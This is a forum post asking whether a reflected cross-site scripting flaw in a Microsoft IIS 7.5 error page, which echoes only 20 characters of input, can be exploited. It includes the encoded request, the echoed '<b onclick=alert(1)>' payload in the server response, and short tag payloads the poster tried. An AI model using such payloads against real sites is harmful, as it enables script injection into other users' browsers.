Jump to content
Aerosol

Microsoft IIS 7.5 Cross Site Scripting

By Aerosol, in Exploituri

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted 

Hello everyone,


I found some weird HTML code injection in an IIS error message. IIS spits
out some part of the user input that generated the error message, but will
only display 20 characters at most.
My question is: is it possible to actually exploit an XSS with this ?

Here is an example:

HTTP Request: mypage?search=%3cb%20onclick%3dalert(1)>%3e
HTTP Response (real):

<p>An error has occured.</p>
    <p>Exception HttpRequestValidationException occurred while attempting
<b>mypage</b></p>
    <p>Exception message is: <b>A potentially dangerous Request.QueryString
value was detected from the client (search="<b
onclick=alert(1)>...").</b></p>
    <p>Stack trace:</p>
    <pre>
Server stack trace:
[..]

My payload was: <b onclick=alert(1)>> and it works (after clicking).
However, can this actually be exploited in real life ? I tried stuff in 20
characters like: <embed src=http://x> or <img src=http://x/z> but no luck.
Has anyone ever tried this before ?

Thanks,

P.S. This might be a silly question with an obvious answer. If so, I'd be
grateful to have some extra information (links, docs etc.).

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...